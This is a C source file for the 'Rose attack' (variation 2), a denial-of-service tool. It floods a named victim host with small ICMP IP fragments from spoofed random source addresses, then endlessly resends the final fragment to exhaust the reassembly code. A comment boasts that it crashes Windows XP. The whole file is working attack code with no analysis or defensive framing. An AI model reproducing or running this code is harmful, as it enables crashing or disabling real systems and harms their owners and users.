NewDAwn.c

/***    ROSE attack (variation 2) (chuck (at) lemure.net)        Discovered by:    gandalf (at) digital.net        code modified from large IGMP attack by:        Kox by Coolio (coolio (at) k-r4d.com)    Sends out small IP fragments totalling up to a large    ICMP packet.  Then repeatedly sends last IP Fragment forcing    reassembly code to traverse to last IP fragment in order to    do a free() followed by a malloc().  Or so it seems.    Reportedly works for TCP / UDP as well, since this is    a IP layer attack.***//* just a thousand kills win XP */#define NUM_PACKETS 100#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <netdb.h>#include <string.h>#include <errno.h>#include <pwd.h>#include <time.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/utsname.h>#include <netinet/in.h>#include <netinet/ip.h>#include <netinet/ip_icmp.h>#include <netinet/ip_icmp.h>void usage(char *arg){        printf("Rose attack/n");        printf("Usage: %s <victim> [source]/n", arg);printf("If source not specified, will send out from random ip's/n");        exit(1);}unsigned int randip(){        struct hostent *he;        struct sockaddr_in sin;        char *buf = (char *)calloc(1, sizeof(char) * 16);        sprintf(buf, "%d.%d.%d.%d",                (random()%191)+23,                (random()%253)+1,                (random()%253)+1,                (random()%253)+1);         return inet_addr(buf);        }unsigned short in_cksum(unsigned short *buh, int len){        register long sum = 0;        unsigned short oddbyte;        register unsigned short answer;        while(len > 1) {                sum += *buh++;                len -= 2;        }        if(len == 1) {                oddbyte = 0;                *((unsigned char *)&oddbyte) = *(unsigned char *)buh;                sum += oddbyte;        }        sum = (sum >> 16) + (sum & 0xFFFF);        sum += (sum >> 16);        answer = ~sum;        return answer;}int fire_away(struct sockaddr_in *victim, unsigned long src){        int SMALLICMP = 1;        unsigned char *pkt;        struct iphdr *ip;        struct igmphdr *igmp;struct icmphdr *icmp_pkt;        struct utsname *un;        struct passwd *p;int idList[NUM_PACKETS];unsigned long j;        int i, s;int id = (random() % 40000) + 500;for (i=0;i<NUM_PACKETS;i++)  idList[i]=(random() % 40000) + 500;                pkt = (unsigned char *)calloc(1, SMALLICMP       + sizeof(struct iphdr) +      sizeof(struct icmphdr));        ip = (struct iphdr *)pkt; icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr));        ip->version = 4;        ip->ihl = (sizeof *ip) / 4;        ip->ttl = 255;        ip->tot_len = htons(SMALLICMP);        ip->protocol = 1;        ip->id = htons(id);        ip->frag_off = htons(IP_MF);        ip->saddr = src;        ip->daddr = victim->sin_addr.s_addr;        ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));icmp_pkt->type = ICMP_ECHO;icmp_pkt->code = 0;icmp_pkt->checksum = 1000;icmp_pkt->un.echo.id = random() % 255;icmp_pkt->un.echo.sequence = random() % 255;        for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1;            i < SMALLICMP; i++){  pkt[i] = random() % 255;  }        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {                perror("error: socket()");                return 1;        }printf(" Sending out series of small fragments/r/n");for(i=0;i<NUM_PACKETS;i++){  ip->id = htons(idList[i]);  for (j=0; j<8170; j += SMALLICMP + 1){        ip->frag_off = htons(j | IP_MF);    if(sendto(s, pkt,      SMALLICMP + sizeof(struct iphdr),       0, (struct sockaddr *)victim,      sizeof(struct sockaddr_in)) == -1) {       perror("error: sendto()");      return 1;    }  }}printf(" Sending out tailing fragments/r/n");/* big frag at end... *//* sending a large amount of the end fragments over and   over.  This is definitely overkill, but seems to work */for (j=0;j<9999*NUM_PACKETS;j++){  for(i=0;i<NUM_PACKETS;i++){    ip->id=htons(idList[i]);    ip->frag_off = htons(8190|IP_MF);    //ip->frag_off = htons(8100 | IP_MF);    sendto(s, pkt, sizeof(struct iphdr) + SMALLICMP,    0, (struct sockaddr *)victim,    sizeof(struct sockaddr_in));    /* if you do sleep, CPU usage goes way down.  But memory usage       still creeps upward */    //usleep(100); //sleep after every trailing packet  }  usleep(100); //sleep after every series of NUM_PACKETS}        free(pkt);        close(s);        return 0;}int main(int argc, char *argv[]){        struct sockaddr_in victim;        struct hostent *he;unsigned long source;        int i;        srandom(time(NULL));        if(argc < 2)                usage(argv[0]);        if((he = gethostbyname(argv[1])) == NULL) {                herror(argv[1]);                exit(1);        }if (argc > 2){  source = inet_addr(argv[2]);}else {  source = randip();}        memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);        victim.sin_port = htons(0);        victim.sin_family = PF_INET;        printf("Sending ICMP fragments:  /r/n");        fflush(stdout);fire_away(&victim, source);if (argc < 3){  source = randip();}fflush(stdout);printf("/nDONE/n");        fflush(stdout);}